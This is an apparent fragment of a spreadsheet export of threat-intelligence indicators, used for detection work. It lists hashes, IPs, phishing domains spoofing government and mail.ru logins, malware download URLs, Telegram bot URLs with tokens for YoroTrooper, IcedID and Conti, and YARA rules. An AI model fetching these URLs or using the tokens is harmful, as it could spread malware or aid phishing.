    <t>a26e8014e67005f1516af849ea4534db2d7a0c8c8b7fffd7890111363439c3f7</t>
  </si>
  <si>
    <t>30574abb4af368912a1f928fe67427bf3e678a205169516d7590f28d0b4bb286</t>
  </si>
  <si>
    <t>e3f35f911f179f96352cfc5887ee5e82a82069e022b60cb35de453f1eb76d1d3</t>
  </si>
  <si>
    <t>4f237b5aa3ff4fc4e3014f693c27a1cba94fc24f3a6054c28d090592343c06a2</t>
  </si>
  <si>
    <t>2293db2e9500cd0a8e76616c5569ef202a9562e8e2148890fa2186dbf7e8a2ee</t>
  </si>
  <si>
    <t>9056feffc79bd34ec2570aac09fdb2165b1bd4d27edf502f32e05970952f2bdd</t>
  </si>
  <si>
    <t>4bde6056cf67d410376bd3c319706032eb899a7548928842d63a886ffd82e1d6</t>
  </si>
  <si>
    <t>41e8adc62dbe14d0364cb5d0db169d2bab52757912bd44a7da6da987dd09b0bd</t>
  </si>
  <si>
    <t>af5d893912f4888eb0c29f02015009187c093fc2cf32bdb6d70eff79b96a29e8</t>
  </si>
  <si>
    <t>2b433f5a2aa1b75d75460e6a22f142a47d9c0bc0a89035f767e10a8b571c7b28</t>
  </si>
  <si>
    <t>d9b8a2d9442ae51002fb6922a5600cf93e83fe4a0534a654b0acbb58bafc5bf4</t>
  </si>
  <si>
    <t>331fd9e2cfe82d0131f9901f168fa91fe60c200b92b2878b704f34d4558e22f9</t>
  </si>
  <si>
    <t>644768aca1cecf034005cda0c6cef682a8797fa45fd5f845081bea41b3990b2d</t>
  </si>
  <si>
    <t>3479b9213da7e381a47e579f011a6a299e0827aff7bccb0900d61ef9ac485a10</t>
  </si>
  <si>
    <t>adccfea997a38c8245784cb9ddf22c4dc739539b4faac09e33acf8ab5a727bbd</t>
  </si>
  <si>
    <t>c868185e0051c53c90ff4d5f2503b5647e8a3f3aac4aa2d0065f2178af60f7cf</t>
  </si>
  <si>
    <t>fa06b71c4c18bffd0283d07fa13a113a6999d2b597cd91eacdc5da3f240a54fb</t>
  </si>
  <si>
    <t>96a70a20a24959dc270e12889e4bff81a86c0e4a0f23b8dc9976843940ec8ddd</t>
  </si>
  <si>
    <t>f3d8916b99d7e6301a885b2ec4aaf9635f1713464c53b1604d3b4e1abd673c36</t>
  </si>
  <si>
    <t>c02c7b9a82a75cb251b2b7307503284a408f20e689f1be30fe50173a8b6e288b</t>
  </si>
  <si>
    <t>db9a6efd5d64ba0ba1783c51b6d430873518fa032bf5265c6837c7674321e183</t>
  </si>
  <si>
    <t>fefddb37c5cfd0fa9746b545c825142df8e6b1f07925f6580a15d018fefb00c7</t>
  </si>
  <si>
    <t>baa924292408e6ba128ef07aa21f065eb45dd2b85322a9db06fc5a828119ba65</t>
  </si>
  <si>
    <t>83d96e476aa72d7ff0d3d0a02f96113834a1c7fdbe523379f7de57f7f06a2005</t>
  </si>
  <si>
    <t>5eb91f4b9f68a02cf2005dd2e95d820ae5be509659a0045ded606f650d028f68</t>
  </si>
  <si>
    <t>85df1d60db3406ea3d7e3f55d6f96acf4656c98c1a97411a4811062de35893b2</t>
  </si>
  <si>
    <t>00284cad6f38d59d9b46a28a1a6789077f298995c79ca18ef87c4c98b14961ac</t>
  </si>
  <si>
    <t>1e4091ce270bf22254868f40f4a282320c3763ee803c0276f863696a2ed9b463</t>
  </si>
  <si>
    <t>d01ac7ecd1f3280f42f2956f0606b96b9da9914b564ef76d45dded3e2f0514d2</t>
  </si>
  <si>
    <t>4b9811f1f8176ec9f2ee647a4c2f171854f296fbc18e47cc08eb82357a6eeec7</t>
  </si>
  <si>
    <t>fd7fe71185a70f281545a815fce9837453450bb29031954dd2301fe4da99250d</t>
  </si>
  <si>
    <t>00466d76832193b3f8be186d00e48005b460d6895798a67bc1c21e4655cb2e62</t>
  </si>
  <si>
    <t>df75defc7bde078faefcb2c1c32f16c141337a1583bd0bc14f6d93c135d34289</t>
  </si>
  <si>
    <t>9a8c72acd91f5a89dbf9fdb7cc4055ae8cf9af60f94187dbab83689da9b33f4e</t>
  </si>
  <si>
    <t>8023da2c9d45536dee2020d38edec20a88b8f5115fca6335929f94c683d60dd5</t>
  </si>
  <si>
    <t>f0f9e05070d9b9804bd65ef4aad9347c69b24a3a7f706cf5771f4ecf3706efeb</t>
  </si>
  <si>
    <t>aa696fd2f4e78f203e44fa282fb97aa31086c2b5c6040afa507c39ffd5847ef3</t>
  </si>
  <si>
    <t>27e69c96af1f692ce43706904de61f841abec45a57ff0b7a7d3cbbb417455a53</t>
  </si>
  <si>
    <t>162.33.177.195</t>
  </si>
  <si>
    <t>1679647232</t>
  </si>
  <si>
    <t>172.105.215.208</t>
  </si>
  <si>
    <t>172.86.75.220</t>
  </si>
  <si>
    <t>192.153.57.67</t>
  </si>
  <si>
    <t>193.149.129.133</t>
  </si>
  <si>
    <t>193.149.176.254</t>
  </si>
  <si>
    <t>206.188.196.86</t>
  </si>
  <si>
    <t>45.227.252.247</t>
  </si>
  <si>
    <t>45.61.136.175</t>
  </si>
  <si>
    <t>45.61.136.64</t>
  </si>
  <si>
    <t>45.61.138.243</t>
  </si>
  <si>
    <t>46.161.40.164</t>
  </si>
  <si>
    <t>46.175.148.147</t>
  </si>
  <si>
    <t>64.190.113.57</t>
  </si>
  <si>
    <t>64.227.24.240</t>
  </si>
  <si>
    <t>89.22.232.145</t>
  </si>
  <si>
    <t>89.22.233.149</t>
  </si>
  <si>
    <t>94.103.86.38</t>
  </si>
  <si>
    <t>94.20.72.7</t>
  </si>
  <si>
    <t>akipress.news</t>
  </si>
  <si>
    <t>archive-downloader.com</t>
  </si>
  <si>
    <t>attachment-posts.cc</t>
  </si>
  <si>
    <t>becloud.cc</t>
  </si>
  <si>
    <t>becloud.website</t>
  </si>
  <si>
    <t>belaes.by.authentication.becloud.cc</t>
  </si>
  <si>
    <t>belstat.gov.by.attachment-posts.cc</t>
  </si>
  <si>
    <t>capitaltrust.uz</t>
  </si>
  <si>
    <t>cloud.archive-downloader.com</t>
  </si>
  <si>
    <t>doc.az-link.email</t>
  </si>
  <si>
    <t>docscpcpipe.inro.link</t>
  </si>
  <si>
    <t>download.az-link.email</t>
  </si>
  <si>
    <t>e-aks.uz</t>
  </si>
  <si>
    <t>e.login.mail-ru.link</t>
  </si>
  <si>
    <t>e.mail.ru.autn.tech</t>
  </si>
  <si>
    <t>e.mail.ru.mypolicy.top</t>
  </si>
  <si>
    <t>e.mail.ru.portal-inbox.com</t>
  </si>
  <si>
    <t>e.nail.ru.imbox.link</t>
  </si>
  <si>
    <t>account.mail.ru.sigriup.site</t>
  </si>
  <si>
    <t>account.nail.ru.horme.info</t>
  </si>
  <si>
    <t>account.nail.ru.inro.link</t>
  </si>
  <si>
    <t>accountyandex.inro.link</t>
  </si>
  <si>
    <t>hbfyewtuvfbhsbdjhjwebfy.net</t>
  </si>
  <si>
    <t>hse.ru.attachment-posts.cc</t>
  </si>
  <si>
    <t>imbox.link</t>
  </si>
  <si>
    <t>industry.tj.mypolicy.top</t>
  </si>
  <si>
    <t>mail.agro.gov.kg.openingfile.net</t>
  </si>
  <si>
    <t>mail.belaes.by.authentication.becloud.cc</t>
  </si>
  <si>
    <t>mail.economy.qov.az-link.email</t>
  </si>
  <si>
    <t>mail.g-cloud.by.authentication.becloud.cc</t>
  </si>
  <si>
    <t>mail.gov.az-link.email</t>
  </si>
  <si>
    <t>mail.hse.ru.attachment-posts.cc</t>
  </si>
  <si>
    <t>mail.iacis.ru.autn.tech</t>
  </si>
  <si>
    <t>mail.mfa.az-link.email</t>
  </si>
  <si>
    <t>mail.mfa.gov.kg.openingfile.net</t>
  </si>
  <si>
    <t>mail.mgimo.ru.sigriup.site</t>
  </si>
  <si>
    <t>mail.ru.authentification.becloud.cc</t>
  </si>
  <si>
    <t>mailacgov.inro.link</t>
  </si>
  <si>
    <t>mailaviacomplect.inro.link</t>
  </si>
  <si>
    <t>maileecommission.inro.link</t>
  </si>
  <si>
    <t>mfa-tj.download</t>
  </si>
  <si>
    <t>minsk.gov.by.attachment-posts.cc</t>
  </si>
  <si>
    <t>moscpcpipe.inro.link</t>
  </si>
  <si>
    <t>mypolicy.top</t>
  </si>
  <si>
    <t>newint.mid.ru.owaut.ru</t>
  </si>
  <si>
    <t>openingfile.net</t>
  </si>
  <si>
    <t>portal-inbox.com</t>
  </si>
  <si>
    <t>rnail.iterrf.ru.inro.link</t>
  </si>
  <si>
    <t>rnail.mintrans.gov.ru.inro.link</t>
  </si>
  <si>
    <t>rnail.rnid.ru.inro.link</t>
  </si>
  <si>
    <t>srm.mfa.tj.uzdaily.news</t>
  </si>
  <si>
    <t>sts.mfa.gov.tr.mypolicy.top</t>
  </si>
  <si>
    <t>true.az-link.email</t>
  </si>
  <si>
    <t>http://172.86.75.220/arxiv.rar</t>
  </si>
  <si>
    <t>http://162.33.177.195/</t>
  </si>
  <si>
    <t>http://168.100.11.137/</t>
  </si>
  <si>
    <t>http://45.61.136.175/</t>
  </si>
  <si>
    <t>http://mail.mfa.az-link.email/+csco+0075676763663a2f2f31302e3130302e3230302e32++/+csco+0075676763663a2f2f31302e3130302e3230302e32++/_task=login</t>
  </si>
  <si>
    <t>http://143.198.80.235/upd.exe</t>
  </si>
  <si>
    <t>http://172.86.75.220/02.08.2022.exe</t>
  </si>
  <si>
    <t>http://172.86.75.220/123.hta</t>
  </si>
  <si>
    <t>http://178.20.45.52/sec/pes.exe</t>
  </si>
  <si>
    <t>http://193.149.176.254/file.exe</t>
  </si>
  <si>
    <t>http://193.149.176.254/hstart.exe</t>
  </si>
  <si>
    <t>1679647233</t>
  </si>
  <si>
    <t>http://212.24.106.218/spoolsv.exe</t>
  </si>
  <si>
    <t>http://45.61.136.64/update.exe</t>
  </si>
  <si>
    <t>http://45.61.137.32/attachments/download/02.08.2022.exe</t>
  </si>
  <si>
    <t>http://45.61.137.32/Scanned_document.exe</t>
  </si>
  <si>
    <t>http://45.61.137.32/svvhost.rar</t>
  </si>
  <si>
    <t>http://45.61.137.32/www.exe</t>
  </si>
  <si>
    <t>http://89.22.233.149/ms7.hta</t>
  </si>
  <si>
    <t>http://89.22.233.149/Spisok_sotrudnikov_1_chast.exe</t>
  </si>
  <si>
    <t>http://94.103.86.38/file.exe</t>
  </si>
  <si>
    <t>http://94.103.86.38/ms1.hta</t>
  </si>
  <si>
    <t>http://94.103.86.38/wz.exe</t>
  </si>
  <si>
    <t>http://account.mail.ru.sigriup.site/</t>
  </si>
  <si>
    <t>http://account.nail.ru.horme.info/</t>
  </si>
  <si>
    <t>http://becloud.website/svchest.exe</t>
  </si>
  <si>
    <t>http://e.mail.ru.autn.tech/</t>
  </si>
  <si>
    <t>http://e.mail.ru.portal-inbox.com/</t>
  </si>
  <si>
    <t>http://e.nail.ru.imbox.link/home/files/%D0%98%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%86%D0%B8%D0%BE%D0%BD%D0%BD%D0%BE%D0%B5%20%D0%BF%D0%B8%D1%81%D1%8C%D0%BC%D0%BE.rar</t>
  </si>
  <si>
    <t>http://iacis.ru/download/spoolsv.exe</t>
  </si>
  <si>
    <t>http://iacis.ru/log/spoolsv.exe</t>
  </si>
  <si>
    <t>http://mfa-tj.download/26478_0001.rar</t>
  </si>
  <si>
    <t>https://45.61.139.224/</t>
  </si>
  <si>
    <t>https://api.telegram.org/bot5885840251:AAG8HoCjrI1QANXkA4oqnJ60lgPP7w86Clg/sendMessage?chat_id=5683385422</t>
  </si>
  <si>
    <t>https://api.telegram.org/bot5974645737:AAEj2Y0MFGEHmvrFSINWeZcAsbjuUkLysnA/sendMessage?chat_id=5683385422</t>
  </si>
  <si>
    <t>https://attachment-posts.cc/files.rar</t>
  </si>
  <si>
    <t>https://becloud.website/obfuscated_compressed_some.exe</t>
  </si>
  <si>
    <t>https://becloud.website/svchest.exe</t>
  </si>
  <si>
    <t>https://capitaltrust.uz/file.pdf</t>
  </si>
  <si>
    <t>https://capitaltrust.uz/lsaasc.exe</t>
  </si>
  <si>
    <t>https://capitaltrust.uz/lsaca.exe</t>
  </si>
  <si>
    <t>https://capitaltrust.uz/lsacs.exe</t>
  </si>
  <si>
    <t>https://capitaltrust.uz/s.hta</t>
  </si>
  <si>
    <t>https://capitaltrust.uz/stel.hta</t>
  </si>
  <si>
    <t>https://cloud.archive-downloader.com/lsacs.exe</t>
  </si>
  <si>
    <t>https://cloud.archive-downloader.com/s.hta</t>
  </si>
  <si>
    <t>https://e-aks.uz/file.pdf</t>
  </si>
  <si>
    <t>https://e-aks.uz/lsacs.exe</t>
  </si>
  <si>
    <t>https://e-aks.uz/s.hta</t>
  </si>
  <si>
    <t>https://e.nail.ru.imbox.link/</t>
  </si>
  <si>
    <t>https://iacis.ru/download/spoolsv.exe</t>
  </si>
  <si>
    <t>https://iacis.ru/log/spoolsv.exe</t>
  </si>
  <si>
    <t>https://mail.mfa.az-link.email/+CSCO+0075676763663A2F2F31302E3130302E3230302E32++/+CSCO+0075676763663A2F2F31302E3130302E3230302E32++/_task=login/</t>
  </si>
  <si>
    <t>https://mfa-tj.download/lo.hta</t>
  </si>
  <si>
    <t>https://portal-inbox.com/</t>
  </si>
  <si>
    <t>https://telegram.akipress.news/1r.exe</t>
  </si>
  <si>
    <t>1679647377</t>
  </si>
  <si>
    <t>initial attack vectors are phishing emails with a file attached, which usually consists of an archive consisting of two files: a shortcut file and a decoy PDF file. The shortcut file is the initial trigger for the infection, while the PDF is the lure to make the infection look legitimate.</t>
  </si>
  <si>
    <t>1679647943</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/yorotrooper-espionage-campaign-cis-turkey-europe/</t>
  </si>
  <si>
    <t>1630839488</t>
  </si>
  <si>
    <t>1630839554</t>
  </si>
  <si>
    <t>domain-propagation-test.be</t>
  </si>
  <si>
    <t>This is a dummy domain to test how quickly domains propagate to other blocklists. Also see https://www.botvrij.eu/domain-propagation.htm</t>
  </si>
  <si>
    <t>Domain Propagation Test</t>
  </si>
  <si>
    <t>Attack</t>
  </si>
  <si>
    <t>https://domain-propagation-test.be</t>
  </si>
  <si>
    <t>1630839439</t>
  </si>
  <si>
    <t>This is a dummy domain to test how quickly domains propagate to other blocklists. Also see https://www.botvrij.eu/domain-propagation.html</t>
  </si>
  <si>
    <t>1630839473</t>
  </si>
  <si>
    <t>This domain does not point to malicious content, and does not have a malicious history.</t>
  </si>
  <si>
    <t>1674714467</t>
  </si>
  <si>
    <t>1674714919</t>
  </si>
  <si>
    <t>win03.xyz</t>
  </si>
  <si>
    <t>Suspected first-stage malware domain</t>
  </si>
  <si>
    <t>Alert (AA23-025A) - Protecting Against Malicious Use of Remote Monitoring and Management Software</t>
  </si>
  <si>
    <t>1674714432</t>
  </si>
  <si>
    <t>myhelpcare.online</t>
  </si>
  <si>
    <t>1674714406</t>
  </si>
  <si>
    <t>win01.xyz</t>
  </si>
  <si>
    <t>1674714444</t>
  </si>
  <si>
    <t>myhelpcare.cc</t>
  </si>
  <si>
    <t>1674714418</t>
  </si>
  <si>
    <t>247secure.us</t>
  </si>
  <si>
    <t>Second-stage malicious domain</t>
  </si>
  <si>
    <t>1674714537</t>
  </si>
  <si>
    <t>hservice.live</t>
  </si>
  <si>
    <t>first-stage domain names follow naming patterns used for IT help/support themed social-engineering</t>
  </si>
  <si>
    <t>gscare.live</t>
  </si>
  <si>
    <t>nhelpcare.info</t>
  </si>
  <si>
    <t>deskcareme.live</t>
  </si>
  <si>
    <t>nhelpcare.cc</t>
  </si>
  <si>
    <t>1674714725</t>
  </si>
  <si>
    <t>https://www.cisa.gov/uscert/ncas/alerts/aa23-025a</t>
  </si>
  <si>
    <t>1621181107</t>
  </si>
  <si>
    <t>1621181463</t>
  </si>
  <si>
    <t>b52c0640957e5032b5160578f8cb99f9b066fde4f9431ee6869b2eea67338f28.dll.exe</t>
  </si>
  <si>
    <t>Conti Ransomware</t>
  </si>
  <si>
    <t>b52c0640957e5032b5160578f8cb99f9b066fde4f9431ee6869b2eea67338f28</t>
  </si>
  <si>
    <t>icju1.exe</t>
  </si>
  <si>
    <t>e54f38d06a4f11e1b92bb7454e70c949d3e1a4db83894db1ab76e9d64146ee06</t>
  </si>
  <si>
    <t>rate_x32.dat</t>
  </si>
  <si>
    <t>eb79168391e64160883b1b3839ed4045b4fd40da14d6eec5a93cfa9365503586</t>
  </si>
  <si>
    <t>192145.dll</t>
  </si>
  <si>
    <t>1621181132</t>
  </si>
  <si>
    <t>vaclicinni.xyz</t>
  </si>
  <si>
    <t>IcedID</t>
  </si>
  <si>
    <t>thulleultinn.club</t>
  </si>
  <si>
    <t>oxythuler.cyou</t>
  </si>
  <si>
    <t>dictorecovery.cyou</t>
  </si>
  <si>
    <t>expertulthima.club</t>
  </si>
  <si>
    <t>ip-dst|port</t>
  </si>
  <si>
    <t>68.183.20.194|80</t>
  </si>
  <si>
    <t>159.89.140.116|443</t>
  </si>
  <si>
    <t>83.97.20.160|443</t>
  </si>
  <si>
    <t>1621181143</t>
  </si>
  <si>
    <t>dimentos.com</t>
  </si>
  <si>
    <t>192.99.178.145|80</t>
  </si>
  <si>
    <t>On port 80</t>
  </si>
  <si>
    <t>1621181164</t>
  </si>
  <si>
    <t>38.135.122.194|8080</t>
  </si>
  <si>
    <t>Proxy</t>
  </si>
  <si>
    <t>1621181198</t>
  </si>
  <si>
    <t>/*_x005F_x000D_
YARA Rule Set_x005F_x000D_
Author: The DFIR Report_x005F_x000D_
Date: 2021-05-09_x005F_x000D_
Identifier: 3584_x005F_x000D_
Reference: https://thedfirreport.com_x005F_x000D_
*/_x005F_x000D_
_x005F_x000D_
/* Rule Set ----------------------------------------------------------------- */_x005F_x000D_
_x005F_x000D_
import "pe"_x005F_x000D_
_x005F_x000D_
rule icedid_rate_x32 {_x005F_x000D_
meta:_x005F_x000D_
description = "files - file rate_x32.dat"_x005F_x000D_
author = "The DFIR Report"_x005F_x000D_
reference = "https://thedfirreport.com"_x005F_x000D_
date = "2021-05-09"_x005F_x000D_
hash1 = "eb79168391e64160883b1b3839ed4045b4fd40da14d6eec5a93cfa9365503586"_x005F_x000D_
strings:_x005F_x000D_
$s1 = "UAWAVAUATVWSH" fullword ascii_x005F_x000D_
$s2 = "UAWAVVWSPH" fullword ascii_x005F_x000D_
$s3 = "AWAVAUATVWUSH" fullword ascii_x005F_x000D_
$s4 = "update" fullword ascii /* Goodware String - occured 207 times */_x005F_x000D_
$s5 = "?klopW@@YAHXZ" fullword ascii_x005F_x000D_
$s6 = "?jutre@@YAHXZ" fullword ascii_x005F_x000D_
$s7 = "PluginInit" fullword ascii_x005F_x000D_
$s8 = "[]_^A\\A]A^A_" fullword ascii_x005F_x000D_
$s9 = "e8[_^A\\A]A^A_]" fullword ascii_x005F_x000D_
$s10 = "[_^A\\A]A^A_]" fullword ascii_x005F_x000D_
$s11 = "Kts=R,4iu" fullword ascii_x005F_x000D_
$s12 = "mqr55c" fullword ascii_x005F_x000D_
$s13 = "R,4i=Bj" fullword ascii_x005F_x000D_
$s14 = "Ktw=R,4iu" fullword ascii_x005F_x000D_
$s15 = "Ktu=R,4iu" fullword ascii_x005F_x000D_
$s16 = "Kt{=R,4iu" fullword ascii_x005F_x000D_
$s17 = "KVL.Mp" fullword ascii_x005F_x000D_
$s18 = "Kt|=R,4iu" fullword ascii_x005F_x000D_
$s19 = "=8c[Vt8=" fullword ascii_x005F_x000D_
$s20 = "Ktx=R,4iu" fullword ascii_x005F_x000D_
condition:_x005F_x000D_
uint16(0) == 0x5a4d and filesize &lt; 700KB and_x005F_x000D_
( pe.imphash() == "15787e97e92f1f138de37f6f972eb43c" and ( pe.exports("?jutre@@YAHXZ") and pe.exports("?klopW@@YAHXZ") and pe.exports("PluginInit") and pe.exports("update") ) or 8 of them )_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
rule conti_cobaltstrike_192145 {_x005F_x000D_
meta:_x005F_x000D_
description = "files - file 192145.dll"_x005F_x000D_
author = "The DFIR Report"_x005F_x000D_
reference = "https://thedfirreport.com"_x005F_x000D_
date = "2021-05-09"_x005F_x000D_
hash1 = "29bc338e63a62c24c301c04961084013816733dad446a29c20d4413c5c818af9"_x005F_x000D_
strings:_x005F_x000D_
$x1 = "cmd.exe /c echo NGAtoDgLpvgJwPLEPFdj&gt;\"%s\"&amp;exit" fullword ascii_x005F_x000D_
$s2 = "veniamatquiest90.dll" fullword ascii_x005F_x000D_
$s3 = "Quaerat magni assumenda nihil architecto labore ullam autem unde temporibus mollitia illum" fullword ascii_x005F_x000D_
$s4 = "Quaerat tempora culpa provident" fullword ascii_x005F_x000D_
$s5 = "Velit consequuntur quisquam tempora error" fullword ascii_x005F_x000D_
$s6 = "Quo omnis repellat ut expedita temporibus eius fuga error" fullword ascii_x005F_x000D_
$s7 = "Dolores ullam tempora error distinctio ut natus facere quibusdam" fullword ascii_x005F_x000D_
$s8 = "Corporis minima omnis qui est temporibus sint quo error magnam" fullword ascii_x005F_x000D_
$s9 = "Officia sit maiores deserunt nobis tempora deleniti aut et quidem fugit" fullword ascii_x005F_x000D_
$s10 = "Rerum tenetur sapiente est tempora qui deserunt" fullword ascii_x005F_x000D_
$s11 = "Sed nulla quaerat porro error excepturi" fullword ascii_x005F_x000D_
$s12 = "Aut tempore quo cumque dicta ut quia in" fullword ascii_x005F_x000D_
$s13 = "Doloribus commodi repudiandae voluptates consequuntur neque tempora ut neque nemo ad ut" fullword ascii_x005F_x000D_
$s14 = "Tempore possimus aperiam nam mollitia illum hic at ut doloremque" fullword ascii_x005F_x000D_
$s15 = "Dolorum eum ipsum tempora non et" fullword ascii_x005F_x000D_
$s16 = "Quas alias illum laborum tempora sit est rerum temporibus dicta et" fullword ascii_x005F_x000D_
$s17 = "Et quia aut temporibus enim repellat dolores totam recusandae repudiandae" fullword ascii_x005F_x000D_
$s18 = "Sed velit ipsa et dolor tempore sunt nostrum" fullword ascii_x005F_x000D_
$s19 = "Veniam voluptatem aliquam et eaque tempore tenetur possimus" fullword ascii_x005F_x000D_
$s20 = "Possimus suscipit placeat dolor quia tempora voluptas qui fugiat et accusantium" fullword ascii_x005F_x000D_
condition:_x005F_x000D_
uint16(0) == 0x5a4d and filesize &lt; 2000KB and_x005F_x000D_
( pe.imphash() == "5cf3cdfe8585c01d2673249153057181" and pe.exports("StartW") or ( 1 of ($x*) or 4 of them ) )_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
rule conti_cobaltstrike_icju1 {_x005F_x000D_
meta:_x005F_x000D_
description = "files - file icju1.exe"_x005F_x000D_
author = "The DFIR Report"_x005F_x000D_
reference = "https://thedfirreport.com"_x005F_x000D_
date = "2021-05-09"_x005F_x000D_
hash1 = "e54f38d06a4f11e1b92bb7454e70c949d3e1a4db83894db1ab76e9d64146ee06"_x005F_x000D_
strings:_x005F_x000D_
$x1 = "cmd.exe /c echo NGAtoDgLpvgJwPLEPFdj&gt;\"%s\"&amp;exit" fullword ascii_x005F_x000D_
$s2 = "veniamatquiest90.dll" fullword ascii_x005F_x000D_
$s3 = "Quaerat magni assumenda nihil architecto labore ullam autem unde temporibus mollitia illum" fullword ascii_x005F_x000D_
$s4 = "Quaerat tempora culpa provident" fullword ascii_x005F_x000D_
$s5 = "Velit consequuntur quisquam tempora error" fullword ascii_x005F_x000D_
$s6 = "Quo omnis repellat ut expedita temporibus eius fuga error" fullword ascii_x005F_x000D_
$s7 = "Dolores ullam tempora error distinctio ut natus facere quibusdam" fullword ascii_x005F_x000D_
$s8 = "Corporis minima omnis qui est temporibus sint quo error magnam" fullword ascii_x005F_x000D_
$s9 = "Officia sit maiores deserunt nobis tempora deleniti aut et quidem fugit" fullword ascii_x005F_x000D_
$s10 = "Rerum tenetur sapiente est tempora qui deserunt" fullword ascii_x005F_x000D_
$s11 = "Sed nulla quaerat porro error excepturi" fullword ascii_x005F_x000D_
$s12 = "Aut tempore quo cumque dicta ut quia in" fullword ascii_x005F_x000D_
$s13 = "Doloribus commodi repudiandae voluptates consequuntur neque tempora ut neque nemo ad ut" fullword ascii_x005F_x000D_
$s14 = "Tempore possimus aperiam nam mollitia illum hic at ut doloremque" fullword ascii_x005F_x000D_
$s15 = "Dolorum eum ipsum tempora non et" fullword ascii_x005F_x000D_
$s16 = "Quas alias illum laborum tempora sit est rerum temporibus dicta et" fullword ascii_x005F_x000D_
$s17 = "Et quia aut temporibus enim repellat dolores totam recusandae repudiandae" fullword ascii_x005F_x000D_
$s18 = "Sed velit ipsa et dolor tempore sunt nostrum" fullword ascii_x005F_x000D_
$s19 = "Veniam voluptatem aliquam et eaque tempore tenetur possimus" fullword ascii_x005F_x000D_
$s20 = "Possimus suscipit placeat dolor quia tempora voluptas qui fugiat et accusantium" fullword ascii_x005F_x000D_
condition:_x005F_x000D_
uint16(0) == 0x5a4d and filesize &lt; 2000KB and_x005F_x000D_
( pe.imphash() == "a6d9b7f182ef1cfe180f692d89ecc759" or ( 1 of ($x*) or 4 of them ) )_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
rule conti_v3 {_x005F_x000D_
_x005F_x000D_
meta:_x005F_x000D_
description = "conti_yara - file conti_v3.dll" _x005F_x000D_
author = "pigerlin" _x005F_x000D_
reference = "https://thedfirreport.com" _x005F_x000D_
date = "2021-05-09" _x005F_x000D_
hash1 = "8391dc3e087a5cecba74a638d50b771915831340ae3e027f0bb8217ad7ba4682"_x005F_x000D_
_x005F_x000D_
strings: _x005F_x000D_
$s1 = "AppPolicyGetProcessTerminationMethod" fullword ascii _x005F_x000D_
$s2 = "conti_v3.dll" fullword ascii _x005F_x000D_
$s3 = " &lt;requestedExecutionLevel level='asInvoker' uiAccess='false' /&gt;" fullword ascii _x005F_x000D_
$s4 = " Type Descriptor'" fullword ascii _x005F_x000D_
$s5 = "operator co_await" fullword ascii _x005F_x000D_
$s6 = " &lt;trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\"&gt;" fullword ascii _x005F_x000D_
$s7 = "api-ms-win-appmodel-runtime-l1-1-2" fullword wide _x005F_x000D_
$s8 = " Base Class Descriptor at (" fullword ascii _x005F_x000D_
$s9 = " Class Hierarchy Descriptor'" fullword ascii _x005F_x000D_
$s10 = " Complete Object Locator'" fullword ascii _x005F_x000D_
$s11 = " delete[]" fullword ascii _x005F_x000D_
$s12 = " &lt;/trustInfo&gt;" fullword ascii _x005F_x000D_
$s13 = "__swift_1" fullword ascii _x005F_x000D_
$s15 = "__swift_2" fullword ascii _x005F_x000D_
$s19 = " delete" fullword ascii_x005F_x000D_
_x005F_x000D_
condition:_x005F_x000D_
uint16(0) == 0x5a4d and filesize &lt; 700KB and_x005F_x000D_
all of them_x005F_x000D_
_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
rule conti_cobaltstrike_192145_icju1_0 {_x005F_x000D_
meta:_x005F_x000D_
description = "files - from files 192145.dll, icju1.exe"_x005F_x000D_
author = "The DFIR Report"_x005F_x000D_
reference = "https://thedfirreport.com"_x005F_x000D_
date = "2021-05-09"_x005F_x000D_
hash1 = "29bc338e63a62c24c301c04961084013816733dad446a29c20d4413c5c818af9"_x005F_x000D_
hash2 = "e54f38d06a4f11e1b92bb7454e70c949d3e1a4db83894db1ab76e9d64146ee06"_x005F_x000D_
strings:_x005F_x000D_
$x1 = "cmd.exe /c echo NGAtoDgLpvgJwPLEPFdj&gt;\"%s\"&amp;exit" fullword ascii_x005F_x000D_
$s2 = "veniamatquiest90.dll" fullword ascii_x005F_x000D_
$s3 = "Quaerat magni assumenda nihil architecto labore ullam autem unde temporibus mollitia illum" fullword ascii_x005F_x000D_
$s4 = "Quaerat tempora culpa provident" fullword ascii_x005F_x000D_
$s5 = "Dolores ullam tempora error distinctio ut natus facere quibusdam" fullword ascii_x005F_x000D_
$s6 = "Velit consequuntur quisquam tempora error" fullword ascii_x005F_x000D_
$s7 = "Corporis minima omnis qui est temporibus sint quo error magnam" fullword ascii_x005F_x000D_
$s8 = "Quo omnis repellat ut expedita temporibus eius fuga error" fullword ascii_x005F_x000D_
$s9 = "Officia sit maiores deserunt nobis tempora deleniti aut et quidem fugit" fullword ascii_x005F_x000D_
$s10 = "Rerum tenetur sapiente est tempora qui deserunt" fullword ascii_x005F_x000D_
$s11 = "Sed nulla quaerat porro error excepturi" fullword ascii_x005F_x000D_
$s12 = "Aut tempore quo cumque dicta ut quia in" fullword ascii_x005F_x000D_
$s13 = "Doloribus commodi repudiandae voluptates consequuntur neque tempora ut neque nemo ad ut" fullword ascii_x005F_x000D_
$s14 = "Tempore possimus aperiam nam mollitia illum hic at ut doloremque" fullword ascii_x005F_x000D_
$s15 = "Et quia aut temporibus enim repellat dolores totam recusandae repudiandae" fullword ascii_x005F_x000D_
$s16 = "Dolorum eum ipsum tempora non et" fullword ascii_x005F_x000D_
$s17 = "Quas alias illum laborum tempora sit est rerum temporibus dicta et" fullword ascii_x005F_x000D_
$s18 = "Sed velit ipsa et dolor tempore sunt nostrum" fullword ascii_x005F_x000D_
$s19 = "Veniam voluptatem aliquam et eaque tempore tenetur possimus" fullword ascii_x005F_x000D_
$s20 = "Possimus suscipit placeat dolor quia tempora voluptas qui fugiat et accusantium" fullword ascii_x005F_x000D_
condition:_x005F_x000D_
( uint16(0) == 0x5a4d and filesize &lt; 2000KB and ( 1 of ($x*) and 4 of them )_x005F_x000D_
) or ( all of them )_x005F_x000D_
}</t>
  </si>
  <si>
    <t>1621181381</t>
  </si>
  <si>
    <t>https://thedfirreport.com/2021/05/12/conti-ransomware/</t>
  </si>
  <si>
    <t>1621181402</t>
  </si>
  <si>
    <t>https://www.ncsc.gov.ie/pdfs/HSE_Conti_140521.pdf</t>
  </si>
  <si>
    <t>1588706027</t>
  </si>
  <si>
    <t>1588706225</t>
  </si>
